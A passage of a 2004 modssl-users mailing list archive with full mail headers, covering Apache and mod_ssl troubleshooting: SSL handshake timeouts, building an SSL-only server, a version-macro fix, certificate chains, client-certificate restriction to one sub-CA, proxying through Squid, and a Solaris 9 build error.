> combination of OS and IE that would
> cause the problems and therefore haven't been able
> to recreate in a test
> environment.
> 
>
http://support.microsoft.com/default.aspx?kbid=305217
>
http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx
> 
> 
> We also get the following error in the SSL error
> log:
> 
> [Tue Oct 26 06:43:04 2004] [error] mod_ssl: SSL
> handshake interrupted by system
> [Hint: Stop button pressed in browser?!] (System
> error follows)
> [Tue Oct 26 06:43:04 2004] [error] System:
> Connection timed out (errno: 145)
> 
> We see this quite a lot during normal operation.
> However, during the periods
> were we hit the MaxClient processes, we see the
> number of these errors increase
> by an order of magnitude.
> 
> Has anyone else seen similar problems and if so,
> what was their solution? If
> this is the problem described on the MS site, what
> version of Windows and IE do
> we need to recreate? Are there any server side only
> solutions?
> 
> We are running on Solaris with apache 1.2.26 and
> mod_ssl 2.8.10 using a Sun
> Crypto 1 SSL accelerator card.
> 
> Any help greatly apprecicated.
> 
> Cheers,
> 
> Dave.
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
__________________________________ 
Do you Yahoo!? 
Check out the new Yahoo! Front Page. 
www.yahoo.com 
 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov  6 01:07:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F2509A89A3; Sat,  6 Nov 2004 01:07:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ux9.isu.edu (ux9.isu.edu [134.50.250.46])
	by master.modssl.org (Postfix) with ESMTP id 32900A8941
	for ; Sat,  6 Nov 2004 01:07:04 +0100 (CET)
Received: from conversion-daemon.ux9.isu.edu by ux9.isu.edu
 (iPlanet Messaging Server 5.2 HotFix 1.26 (built Mar 31 2004))
 id <0I6Q00H01D8ULJ@ux9.isu.edu> (original mail from wheakory@isu.edu)
 for modssl-users@modssl.org; Fri, 05 Nov 2004 17:07:01 -0700 (MST)
Received: from isu.edu (wheakory.isu.edu [134.50.249.22])
 by ux9.isu.edu (iPlanet Messaging Server 5.2 HotFix 1.26 (built Mar 31 2004))
 with ESMTPA id <0I6Q005J7DNOB5@ux9.isu.edu> for modssl-users@modssl.org; Fri,
 05 Nov 2004 17:07:01 -0700 (MST)
Date: Fri, 05 Nov 2004 17:07:06 -0700
From: Kory Wheatley 
Subject: Mod-ssl and apache configuration question
To: modssl-users@modssl.org
Message-id: <418C15AA.6040709@isu.edu>
MIME-version: 1.0
Content-type: text/plain; format=flowed; charset=ISO-8859-1
Content-transfer-encoding: 7BIT
X-Accept-Language: en-us, en
User-Agent: Mozilla Thunderbird 0.5 (Windows/20040207)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kory Wheatley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a project where I need to setup an Apache secure server.  I have 
an Apache non secure server already on my workstation.  I don't want the 
Apache secure server to run under the same daemon service, so I've 
downloaded a separate Apache tar file.

This server also needs to run under a different user and group.

What is the steps of compiling Mod_SSL and DSO into Apache and under a 
different server user.  This setup will only be for a secure server and 
no other virtual hosts.

If there's a step by step process to do this that would be really nice.

-- 
Kory Wheatley
Academic Computing Analyst Sr.
Phone 282-3874
#########################################
Everything must point to him.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov  7 12:00:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B581A8A79; Sun,  7 Nov 2004 12:00:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 4A3FEA8A65
	for ; Sun,  7 Nov 2004 12:00:21 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 14E4E4CE57F; Sun,  7 Nov 2004 12:00:21 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 925AEA17A8; Sun,  7 Nov 2004 11:49:29 +0100 (CET)
Date: Sun, 7 Nov 2004 11:49:29 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: macro redefined: OPENSSL_free
Message-ID: <20041107104929.GA70373@engelschall.com>
References: <200411020818.JAA15890@r2d2.physik3.gwdg.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200411020818.JAA15890@r2d2.physik3.gwdg.de>
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Nov 02, 2004, Hans Werner Strube wrote:

> When compiling modssl (at least 2.8.17 to 2.8.22, have overlooked this
> earlier), there are many warnings:
> "./ssl_util_ssl.h", line 90: warning: macro redefined: OPENSSL_free
> My openssl version is 0.9.6m (the latest 0.9.6 release), defining
> in opensslv.h and crypto.h, respectively:
> #define OPENSSL_VERSION_NUMBER 0x009060dfL
> #define OPENSSL_free(addr) CRYPTO_free(addr)
>
> Thus, since 0x009060df < 0x00906100, modssl uses free() instead of
> CRYPTO_free(). Is this really intended?
> Otherwise the SSL_LIBRARY_VERSION test in ssl_util_ssl.h, line 89, should
> use a smaller number than 0x00906100. AfaIk the macro OPENSSL_free was
> already introduced on the transition from 0.9.5 to 0.9.6.

Hmmm... yes, the problem was that between 0.9.5 and 0.9.6 the encoding
of OPENSSL_VERSION_NUMBER changed and it seems I adjusted the definition
in ssl_util_ssl.h without recognizing this. I'll use the following now:

-#if SSL_LIBRARY_VERSION < 0x00906100
+#if SSL_LIBRARY_VERSION < 0x00906000

Thanks for the hint.
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  8 22:04:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6FB3BA8CCC; Mon,  8 Nov 2004 22:04:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id AAAD5A8A6D
	for ; Mon,  8 Nov 2004 22:04:11 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 9A1E7669B0
	for ; Mon,  8 Nov 2004 22:03:58 +0100 (CET)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 25152-04 for ;
 Mon,  8 Nov 2004 22:03:55 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 2C3D1669D6; Mon,  8 Nov 2004 22:03:55 +0100 (CET)
Date: Mon, 8 Nov 2004 22:03:55 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Mod-ssl and apache configuration question
Message-ID: <20041108210355.GB19073@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <418C15AA.6040709@isu.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <418C15AA.6040709@isu.edu>
X-Mailer: mutt
X-Virus-Scanned: by amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Nov 05, 2004 at 05:07:06PM -0700, Kory Wheatley wrote:
> I have a project where I need to setup an Apache secure server.  I have 
> an Apache non secure server already on my workstation.  I don't want the 
> Apache secure server to run under the same daemon service, so I've 
> downloaded a separate Apache tar file.
> 
> This server also needs to run under a different user and group.
> 
> What is the steps of compiling Mod_SSL and DSO into Apache and under a 
> different server user.  This setup will only be for a secure server and 
> no other virtual hosts.
> 
> If there's a step by step process to do this that would be really nice.
> 
You don't need anything special to do this - just build apache with mod_ssl
and change the config so that you have it listening on port 443 only. Then
change User and Group to whatever user you want it to run under. That's
really all you need to do.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 15 16:16:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D979AA8A4F; Mon, 15 Nov 2004 16:16:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail03.eznettools.net (mail.eznettools.net [12.42.147.40])
	by master.modssl.org (Postfix) with ESMTP id 1BCC3A893B
	for ; Mon, 15 Nov 2004 16:16:29 +0100 (CET)
Received: from testing (shadow.icserv.net [12.42.147.37] (may be forged))
	by mail03.eznettools.net (8.13.1/8.12.5) with SMTP id iAFG3XfS001996
	for ; Mon, 15 Nov 2004 09:03:37 -0700
Message-ID: <006401c4cb25$f32408b0$2500a8c0@eckmandomain.corporate.icserv.net>
From: "Philip Larkin Waters" 
To: 
References: <6176123d0410280942301e1ee6@mail.gmail.com> <6176123d04102810173903b48b@mail.gmail.com>
Subject: Re: mod_ssl and MacOS browsers...
Date: Mon, 15 Nov 2004 08:15:27 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philip Larkin Waters" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are you using a real certificate or a test certificate. If it is a test
certificate you have to install a "Test Certificate Authority" which you
may have already done on your windows machines but not on your Mac.
Could that be it.?

____
Theory is when you know something, but it doesn't work.
Practice is when something works, but you don't know why.
Programmers combine theory and practice:
Nothing works and they don't know why.
--Unknown
----- Original Message ----- 
From: "Tim Howell" 
To: 
Sent: Thursday, October 28, 2004 10:17 AM
Subject: Re: mod_ssl and MacOS browsers...


> On Thu, 28 Oct 2004 09:42:53 -0700, Tim Howell
>  wrote:
> > I've just installed a VeriSign 128 bit certificate on a server
running
> > Apache 2.0.50 with mod_ssl.  Connecting to the server over https
works
> > fine from all of the Windows clients I've tried (Win2K using both IE
6
> > and Firefox 1.0PR).  However, whenever I try to connect from a MacOS
> > client (using MSIE 5.1, current Safari, or Firefox 1.0PR) I get a
> > warning that the certificate issuer is unknown.
> >
> > Any ideas?  This is for a system that is (hopefully) going into
> > production in a couple of days.  =)  I've searched the list archives
> > to no avail.
> >
> > Thanks!  =)
> >
> > --TWH
>
> I think I've solved my own problem.  The solution might be useful for
> the archives.
>
> I had to download an intermediary CA certificate from the VeriSign
> website and install that using the SSLCertificateChainFile option.
>
> --TWH
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 16 08:33:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C7AFCA8A99; Thu, 16 Dec 2004 08:33:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay12.arbeitsamt.de (relay12.arbeitsamt.de [212.204.77.23])
	by master.modssl.org (Postfix) with ESMTP id 612BCA8A6D
	for ; Thu, 16 Dec 2004 08:33:03 +0100 (CET)
Message-ID: 
From: Fitzner Daniel 
To: "'modssl-users@modssl.org'" 
Subject: Clientauthentication with Certificates and Apache
Date: Thu, 16 Dec 2004 08:32:51 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fitzner Daniel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello guys,

I have following pki-environment:

			RootCA
			|	|
	Issuing SubCA-1	Issuing SubCA-2
	|					|
UserCert-A					UserCert-B

I want to make clientauthentication with certificates only for user with certs from the Issuing SubCA-2.

So I made the follwing configuration:

SSLVerifyClient require
SSLCACertificateFile    CACHAIN.PEM
SSLVerifyDepth 2

CACHAIN.PEM includes the cert from RootCA and from the Issuing SubCA-2.

Now comes the problem. Not only users with certs from SubCA-2 can connect, also users with certs from the SubCA-1 (f.i. UserCert-A) can connect.

How can I avoid this??? 

I tried to use only the certificate from SubCA-2 in the directive (SSLCACertificateFile	SubCA-2.pem), but with this config noone can connect, also not the clients with certs from SubCA-2.

I know the possibility to check for various ingredients of the client certficate (http://www.modssl.org/docs/2.8/ssl_howto.html#auth-particular) but I don't want to use this. 

I readed an old post (http://www.mail-archive.com/modssl-users@modssl.org/msg10335.html) in this mailinglist. This post said, that users with certs from SubCA-1 should not be connect.

Please help, I have no new ideas.

Best regards daniel



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 16 09:07:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 46698A8A9F; Thu, 16 Dec 2004 09:07:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-out.fr.clara.net (smtp-out.fr.clara.net [212.43.194.39])
	by master.modssl.org (Postfix) with ESMTP id D317DA8A59
	for ; Thu, 16 Dec 2004 09:07:06 +0100 (CET)
Received: from [10.0.0.69] (ATuileries-117-1-28-129.w193-253.abo.wanadoo.fr [193.253.59.129])
	by smtp-out.fr.clara.net (Postfix) with ESMTP id 5ED89464EA
	for ; Thu, 16 Dec 2004 09:06:56 +0100 (CET)
Message-ID: <41C1421F.80908@idtect.com>
Date: Thu, 16 Dec 2004 09:06:55 +0100
From: Charles-Edouard Ruault 
Organization: Idtect SA
User-Agent: Mozilla Thunderbird 1.0 (Macintosh/20041206)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Clientauthentication with Certificates and Apache
References: 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Charles-Edouard Ruault 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Fitzner Daniel wrote:

>Hello guys,
>
>I have following pki-environment:
>
>			RootCA
>			|	|
>	Issuing SubCA-1	Issuing SubCA-2
>	|					|
>UserCert-A					UserCert-B
>
>I want to make clientauthentication with certificates only for user with certs from the Issuing SubCA-2.
>
>So I made the follwing configuration:
>
>SSLVerifyClient require
>SSLCACertificateFile    CACHAIN.PEM
>SSLVerifyDepth 2
>
>CACHAIN.PEM includes the cert from RootCA and from the Issuing SubCA-2.
>
>Now comes the problem. Not only users with certs from SubCA-2 can connect, also users with certs from the SubCA-1 (f.i. UserCert-A) can connect.
>
>How can I avoid this??? 
>
>I tried to use only the certificate from SubCA-2 in the directive (SSLCACertificateFile	SubCA-2.pem), but with this config noone can connect, also not the clients with certs from SubCA-2.
>
>I know the possibility to check for various ingredients of the client certficate (http://www.modssl.org/docs/2.8/ssl_howto.html#auth-particular) but I don't want to use this. 
>
>I readed an old post (http://www.mail-archive.com/modssl-users@modssl.org/msg10335.html) in this mailinglist. This post said, that users with certs from SubCA-1 should not be connect.
>
>Please help, I have no new ideas.
>
>Best regards daniel
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>  
>
Hi Daniel,
have a look at this topic of the moddsl howto, it will help you solve 
your problem : http://www.modssl.org/docs/2.8/ssl_howto.html#ToC8
Good luck.

-- 
Charles-Edouard Ruault
Idtect SA
115 rue Reaumur - 75002, Paris, France
Tel: +33-1-55-34-76-65
Fax: +33-1-55-34-76-75
Web: http://www.idtect.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 16 09:10:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 77A04A8A53; Thu, 16 Dec 2004 09:10:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay13.arbeitsamt.de (relay13.arbeitsamt.de [212.204.77.25])
	by master.modssl.org (Postfix) with ESMTP id 06D75A8963
	for ; Thu, 16 Dec 2004 09:10:24 +0100 (CET)
Message-ID: 
From: Fitzner Daniel 
To: "'modssl-users@modssl.org'" 
Subject: Combining Reverse Proxy with a Forwarding Proxy and SSL
Date: Thu, 16 Dec 2004 09:10:11 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fitzner Daniel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello guys,

I have a problem with a special environment:

Client	---http---->	Apache Reverse Proxy (1.1.1.1) -----https-----> 	Squid Forwarding/Chaching Proxy (1.1.1.2) ----https----->	Webserver (1.1.1.3)

The client makes http-request to my apache reverse proxy. This reverse proxy should forward this request via https to the real webserver. But this request should go trough a forwarding/caching proxy (squid). 

If I setup this environment with apache 2.0.51 and this config:


ServerName XXXXXX
ServerAdmin mailadmin@example.com
ProxyRequests Off
ProxyRemote * http://1.1.1.2:3128  
SSLProxyEngine on
ProxyPass / https://1.1.1.3/  
ProxyPassReverse / https://1.1.1.3/  


I got following error message:

[error] (20014)Error string not specified yet: proxy: request failed to 1.1.1.2:3128

If I use http between reverse proxy and the webserver it works with the forwarding proxy:

Client	---http---->	Apache Reverse Proxy (1.1.1.1) -----http-----> 	Squid Forwarding/Chaching Proxy (1.1.1.2) ----http----->	Webserver (1.1.1.3)

It also works with https, if I don't use the proxy:

Client	---http---->	Apache Reverse Proxy (1.1.1.1) -----https-----> 	Webserver (1.1.1.3)

Is my environment supported by apache with modssl??? If yes, how I have to configure the apache??

Thanks and best regards daniel










______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 16 10:00:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 08D3AA8999; Thu, 16 Dec 2004 10:00:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from torrente.camerfirma.com (142.Red-213-98-19.pooles.rima-tde.net [213.98.19.142])
	by master.modssl.org (Postfix) with ESMTP id 4388DA8962
	for ; Thu, 16 Dec 2004 10:00:32 +0100 (CET)
Received: (qmail 14394 invoked from network); 16 Dec 2004 09:00:14 -0000
Received: from unknown (HELO juananxinu) ([192.0.0.36])
          (envelope-sender )
          by torrente.camerfirma.com (qmail-ldap-1.03) with SMTP
          for ; 16 Dec 2004 09:00:14 -0000
From: "Juan Angel Martin (AC Camerfirma)" 
To: 
Subject: RE: Clientauthentication with Certificates and Apache
Date: Thu, 16 Dec 2004 10:00:13 +0100
Message-ID: <002d01c4e34d$a7d493d0$240000c0@juananxinu>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
In-reply-to: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Juan Angel Martin (AC Camerfirma)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I thought that you must to put into your SSLCACertificateFile the RootCA =
and
Issuing SubCA-2 certificates (both in PEM) and modify your =
SSLVerifyDepth to
1.

It works in my servers.

bye

Juan Angel Martin Gomez
AC Camerfirma
Tel. +34 920252750  Fax +34 920252732
http://www.camerfirma.com


-----Mensaje original-----
De: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
En
nombre de Fitzner Daniel
Enviado el: jueves, 16 de diciembre de 2004 8:33
Para: 'modssl-users@modssl.org'
Asunto: Clientauthentication with Certificates and Apache

Hello guys,

I have following pki-environment:

			RootCA
			|	|
	Issuing SubCA-1	Issuing SubCA-2
	|					|
UserCert-A					UserCert-B

I want to make clientauthentication with certificates only for user with
certs from the Issuing SubCA-2.

So I made the follwing configuration:

SSLVerifyClient require
SSLCACertificateFile    CACHAIN.PEM
SSLVerifyDepth 2

CACHAIN.PEM includes the cert from RootCA and from the Issuing SubCA-2.

Now comes the problem. Not only users with certs from SubCA-2 can =
connect,
also users with certs from the SubCA-1 (f.i. UserCert-A) can connect.

How can I avoid this???=20

I tried to use only the certificate from SubCA-2 in the directive
(SSLCACertificateFile	SubCA-2.pem), but with this config noone can
connect, also not the clients with certs from SubCA-2.

I know the possibility to check for various ingredients of the client
certficate =
(http://www.modssl.org/docs/2.8/ssl_howto.html#auth-particular)
but I don't want to use this.=20

I readed an old post
(http://www.mail-archive.com/modssl-users@modssl.org/msg10335.html) in =
this
mailinglist. This post said, that users with certs from SubCA-1 should =
not
be connect.

Please help, I have no new ideas.

Best regards daniel



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 16 14:30:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7440FA8A53; Thu, 16 Dec 2004 14:30:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sales.org (athedsla-0033.otenet.gr [62.103.64.33])
	by master.modssl.org (Postfix) with SMTP id 96100A8963
	for ; Thu, 16 Dec 2004 14:30:55 +0100 (CET)
Date: Thu, 16 Dec 2004 12:42:31 +0200
To: modssl-users@modssl.org
Subject: Site changes
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users







______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 17 02:04:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 631ECA8A59; Fri, 17 Dec 2004 02:04:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp806.mail.ukl.yahoo.com (smtp806.mail.ukl.yahoo.com [217.12.12.196])
	by master.modssl.org (Postfix) with SMTP id E1585A8933
	for ; Fri, 17 Dec 2004 02:04:48 +0100 (CET)
Received: from unknown (HELO ?192.168.1.40?) (modssl-users@modssl.org@81.154.26.215 with poptime)
  by smtp806.mail.ukl.yahoo.com with SMTP; 17 Dec 2004 01:04:38 -0000
Message-ID: <41C22F7E.8080900@steve-parker.org>
Date: Fri, 17 Dec 2004 00:59:42 +0000
From: Steve Parker 
User-Agent: Mozilla Thunderbird 1.0RC1 (X11/20041203)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Solaris 9 / modssl-2.8.22-1.3.33 problems
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Parker 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi modssl-users,

I'm having trouble building mod-ssl with Apache on Solaris 9, and have 
run out of ideas.
I've been building Apache/mod-ssl happily for the past few years 
(although I claim no expertise in the matter), most recently having 
built this exact software combination on Solaris 7, which is running 
quite happily.
However, we feel the need to upgrade from the aging Solaris 7, but the 
build is not working.

Versions of things:
  OpenSSL 0.9.7e
  Mod-SSL 2.8.22-1.3.33
  Apache 1.3.33
  Solaris 9 SPARC (64-bit)
  gcc 3.4.2 (from www.sunfreeware.com)
  GNU ld 2.11.2 (again, from www.sunfreeware.com)
  flex 2.5.31

Summary:
It seems from http://forum.sun.com/thread.jspa?threadID=18986&tstart=15 
that this was a problem with 2.8.17,  fixed in 2.8.18 with a sed command 
on line 244 of apache-1.3.33/src/modules/ssl/Makefile:

242: ssl_expr_scan.c: ssl_expr_scan.l ssl_expr_parse.h
243:         flex -Pssl_expr_yy -s -B ssl_expr_scan.l
244:         sed -e '/$$Header:/d' ssl_expr_scan.c 
&& rm -f lex.ssl_expr_yy.c

This fix isn't working for me; the generated ssl_expr_scan.c errs at 
line 1900:
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
ssl_expr_scan.c && mv ssl_expr_scan.o ssl_expr_scan.lo
lex.ssl_expr_yy.c:1900: error: parse error before numeric constant

Line 1900 of ssl_expr_scan.c is:
YY_BUFFER_STATE ssl_expr_yy_scan_string (yyconst char * str )


Actions taken:
# cd openssl-0.9.7e
# ./Configure solaris64-sparcv9-gcc -fPIC
# make && make install
# cd ../mod-ssl-2.8.22-1.3.33
# ./configure --with-apache=../apache_1.3.33/ \
    --with-ssl=../openssl-0.9.7e/ \
    --enable-module=ssl --prefix=/usr/local/apache \
    --enable-shared=ssl --enable-suexec                  \
    --suexec-docroot=/usr/local/apache/htdocs        \
    --suexec-logfile=/usr/local/apache/logs/suexec_log                \
    --suexec-caller=apache    --suexec-uidmin=1000             \
    --suexec-gidmin=1000    --suexec-safepath="/bin:/usr/bin"     \
    --enable-module=most --enable-shared=max       \
    --enable-module=proxy --enable-shared=proxy
# cd ../apache-1.3.33
# make

Results:
[....]
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
ssl_scache_dbm.c && mv ssl_scache_dbm.o ssl_scache_dbm.lo
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
